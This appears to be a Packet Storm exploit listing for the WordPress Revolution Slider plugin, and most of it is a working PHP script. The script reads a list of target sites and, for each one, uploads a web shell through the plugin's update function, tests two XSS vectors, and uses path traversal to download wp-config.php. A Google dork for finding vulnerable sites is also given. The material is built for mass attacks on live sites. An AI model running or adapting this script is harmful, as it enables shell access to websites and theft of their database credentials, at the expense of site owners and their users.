WordPress Revslider Arbitrary File Upload / Download / XSS

2015-06-23T00:00:00
ID PACKETSTORM:132424
Type packetstorm
Reporter CaFc Versace
Modified 2015-06-23T00:00:00

Description

                                        
                                            `#####################################################################################  
# Exploit Title : WordPress Revslider Arbitrary File Upload, Download & Cross Site Scripting  
# Google Dork : inurl:"/wp-content/plugins/revslider/"  
# Date : 21-06-2015  
# Exploit Author : CaFc Versace  
# Vendor Homepage : http://revolution.themepunch.com/  
# Tested on : Windows 7  
# Contact : cafc.versace[@]surabayablackhat.org; me[@]dwisiswanto.my.id  
#####################################################################################  
  
  
# Exploit & PoC :  
-------------------------------------------------------------------------------------  
<?php  
/** me@dwisiswanto.my.id **/  
  
/******************************************  
First, install PHP CLI  
USAGE: php exploit.php list-of-target.txt  
******************************************/  
  
$cafc = array(  
"file"=>"revslider.zip", // enter a ur shell file into a zip  
"xss"=>"<marquee>CaFc Versace was Here", // for xss  
"kfg"=>"..\wp-config.php" // for download config  
);  
  
function hajar($yuerel, $dataAing=null) {  
$cuih = curl_init();  
curl_setopt($cuih, CURLOPT_URL, $yuerel);  
if ($dataAing != null){  
curl_setopt($cuih, CURLOPT_POST, true);  
curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);  
}  
curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);  
curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);  
$eks = curl_exec($cuih);  
curl_close($cuih);  
return $eks;  
}  
  
$site = @file_get_contents($argv[1]);  
$tumbal = explode("\r\n", $site);  
echo "Calculate the target list : " . count($tumbal);  
if (!isset($site)) {  
echo "Site N/A.";  
} else {  
foreach ($tumbal as $uri) {  
echo "\n------------------------------------";  
echo "\nTarget => " . $uri;  
echo "\n";  
$menta = hajar($uri . "/wp-admin/admin-ajax.php", array(  
"action" => "revslider_ajax_action",  
"client_action" => "update_plugin",  
"update_file" => $cafc['file'])  
);  
$jason = json_decode($menta, true);  
if ($jason['success'] == false || $jason['message'] == "Wrong request") {  
echo "\nExploit [update_plugin] => NOT VULNERABLE";  
} else {  
echo "\nExploit [update_plugin] => SUCCESS";  
echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";  
}  
  
$menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(  
"action" => "revslider_ajax_action",  
"client_action" => "get_captions_css",  
"data" => $cafc['xss'])  
);  
$jasonB = json_decode($menta2, true);  
if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {  
echo "\nExploit [get_captions_css] => NOT VULNERABLE";  
} elseif ($jasonB['success'] == true) {  
echo "\nExploit [get_captions_css] => SUCCESS";  
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";  
echo "action=revslider_ajax_action&";  
echo "client_action=get_captions_css";  
echo "data=" . urlencode($cafc['xss']) . "\n";  
}  
  
$menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(  
"action" => "revslider_ajax_action",  
"client_action" => $cafc['xss'])  
);  
$jasonC = json_decode($menta3, true);  
if (preg_match("/wrong ajax action/i", $jasonC['message'])) {  
echo "\nExploit [xss] => SUCCESS";  
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";  
echo "action=revslider_ajax_action";  
echo "client_action=" . urlencode($cafc['xss']) . "\n";  
} else {  
echo "\nExploit [xss] => NOT VULNERABLE";  
}  
  
$menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(  
"action" => "revslider_show_image",  
"img" => $cafc['kfg']),  
$uri);  
if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {  
echo "\nExploit [wp-config] => NOT VULNERABLE\n";  
} else {  
echo "\nExploit [wp-config] => SUCCESS";  
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";  
echo "action=revslider_show_image";  
echo "img=" . $cafc['kfg'] . "\n";  
}  
}  
}  
?>  
-------------------------------------------------------------------------------------  
  
  
# Credits :  
-------------------------------------------------------------------------------------  
CaFc Versace  
Thanks : Agency CaFc - Surabaya BlackHat  
-------------------------------------------------------------------------------------  
  
  
./learn to be better  
`